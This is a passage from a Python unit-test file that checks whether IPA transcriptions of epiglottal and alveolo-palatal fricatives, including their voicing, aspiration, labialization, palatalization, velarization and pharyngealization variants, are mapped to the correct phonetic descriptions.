expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜˤ")
self.assertEqual(actual, expected)
def test_ʜ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ˤ")
self.assertEqual(actual, expected)
def test_ʜ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ˤ")
self.assertEqual(actual, expected)
def test_ʢ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ˤ")
self.assertEqual(actual, expected)
def test_ʢ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated epiglottal fricative pulmonic egressive consonant
def test_ʜʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant
def test_ʜʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰʷ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant
def test_ʜʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰʲ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant
def test_ʜʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰˠ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʜʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰˤ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced epiglottal fricative pulmonic egressive consonant
def test_ʢ_is_the_representation_of_the_voiced_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ")
self.assertEqual(actual, expected)
def test_ʜ̬_is_the_representation_of_the_voiced_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬")
self.assertEqual(actual, expected)
def test_ʜ̬_is_the_representation_of_the_voiced_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬")
self.assertEqual(actual, expected)
# voiced labialized epiglottal fricative pulmonic egressive consonant
def test_ʢʷ_is_the_representation_of_the_voiced_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʷ")
self.assertEqual(actual, expected)
def test_ʜ̬ʷ_is_the_representation_of_the_voiced_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʷ")
self.assertEqual(actual, expected)
def test_ʜ̬ʷ_is_the_representation_of_the_voiced_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized epiglottal fricative pulmonic egressive consonant
def test_ʢʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʲ")
self.assertEqual(actual, expected)
def test_ʜ̬ʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʲ")
self.assertEqual(actual, expected)
def test_ʜ̬ʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized epiglottal fricative pulmonic egressive consonant
def test_ʢˠ_is_the_representation_of_the_voiced_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢˠ")
self.assertEqual(actual, expected)
def test_ʜ̬ˠ_is_the_representation_of_the_voiced_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ˠ")
self.assertEqual(actual, expected)
def test_ʜ̬ˠ_is_the_representation_of_the_voiced_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʢˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢˤ")
self.assertEqual(actual, expected)
def test_ʜ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ˤ")
self.assertEqual(actual, expected)
def test_ʜ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated epiglottal fricative pulmonic egressive consonant
def test_ʢʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized epiglottal fricative pulmonic egressive consonant
def test_ʢʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰʷ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant
def test_ʢʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰʲ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized epiglottal fricative pulmonic egressive consonant
def test_ʢʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰˠ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʢʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰˤ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolo-palatal fricative pulmonic egressive consonant
def test_ɕ_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ")
self.assertEqual(actual, expected)
def test_ɕ̊_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊")
self.assertEqual(actual, expected)
def test_ɕ̥_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥")
self.assertEqual(actual, expected)
def test_ʑ̊_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊")
self.assertEqual(actual, expected)
def test_ʑ̥_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʷ")
self.assertEqual(actual, expected)
def test_ɕ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ʷ")
self.assertEqual(actual, expected)
def test_ɕ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ʷ")
self.assertEqual(actual, expected)
def test_ʑ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʷ")
self.assertEqual(actual, expected)
def test_ʑ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʲ")
self.assertEqual(actual, expected)
def test_ɕ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ʲ")
self.assertEqual(actual, expected)
def test_ɕ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ʲ")
self.assertEqual(actual, expected)
def test_ʑ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʲ")
self.assertEqual(actual, expected)
def test_ʑ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕˠ")
self.assertEqual(actual, expected)
def test_ɕ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ˠ")
self.assertEqual(actual, expected)
def test_ɕ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ˠ")
self.assertEqual(actual, expected)
def test_ʑ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ˠ")
self.assertEqual(actual, expected)
def test_ʑ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕˤ")
self.assertEqual(actual, expected)
def test_ɕ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ˤ")
self.assertEqual(actual, expected)
def test_ɕ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ˤ")
self.assertEqual(actual, expected)
def test_ʑ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ˤ")
self.assertEqual(actual, expected)
def test_ʑ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰ_is_the_representation_of_the_voiceless_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰʷ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰʲ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰˠ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰˤ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolo-palatal fricative pulmonic egressive consonant
def test_ʑ_is_the_representation_of_the_voiced_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ")
self.assertEqual(actual, expected)
def test_ɕ̬_is_the_representation_of_the_voiced_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬")
self.assertEqual(actual, expected)
def test_ɕ̬_is_the_representation_of_the_voiced_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬")
self.assertEqual(actual, expected)
# voiced labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʷ_is_the_representation_of_the_voiced_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʷ")
self.assertEqual(actual, expected)
def test_ɕ̬ʷ_is_the_representation_of_the_voiced_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʷ")
self.assertEqual(actual, expected)
def test_ɕ̬ʷ_is_the_representation_of_the_voiced_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʲ_is_the_representation_of_the_voiced_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʲ")
self.assertEqual(actual, expected)
def test_ɕ̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʲ")
self.assertEqual(actual, expected)
def test_ɕ̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑˠ_is_the_representation_of_the_voiced_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑˠ")
self.assertEqual(actual, expected)
def test_ɕ̬ˠ_is_the_representation_of_the_voiced_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ˠ")
self.assertEqual(actual, expected)
def test_ɕ̬ˠ_is_the_representation_of_the_voiced_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑˤ_is_the_representation_of_the_voiced_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑˤ")
self.assertEqual(actual, expected)
def test_ɕ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ˤ")
self.assertEqual(actual, expected)
def test_ɕ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
